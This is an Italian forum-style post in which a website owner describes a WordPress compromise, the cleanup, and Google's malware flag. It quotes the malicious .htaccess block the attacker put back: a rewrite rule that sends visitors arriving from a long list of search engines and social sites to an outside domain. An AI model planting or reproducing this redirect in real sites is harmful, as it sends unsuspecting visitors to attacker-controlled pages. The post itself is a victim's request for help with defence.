Il mio sito web è stato vietato come sito Web di malware da parte di Google. Quando ho controllato il codice, ho scoperto che alcuni codici hanno iniettato molti file sul mio server. Ho pulito tutto manualmente, modificato tutti i file sul mio server (hosting condiviso) cercando un codice dal codice inserito in tutti i file. Anche il file .htaccess è stato modificato dall'hacker.
Nel sito web c'erano due installazioni di WordPress, in due diverse sottocartelle della radice del sito Web, che non erano state aggiornate. Ho aggiornato entrambi.
Quindi Google ha rimosso il divieto sul mio sito web.
Ieri ho scoperto che il file .htaccess sul mio sito web è stato nuovamente modificato dall'attaccante. Ecco il codice:
#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#
Ho cercato "b58b6f" in tutti i file, ma non ne trovo nessuno. Penso che questo sia l'unico file modificato dall'attacco più recente. Ho cancellato questo file .htaccess, dato che non ne ho bisogno.
In che modo l'hacker è riuscito a hackerare il mio sito web? Come impedire che ciò accada di nuovo? Come posso rendere più sicuro il mio sito web?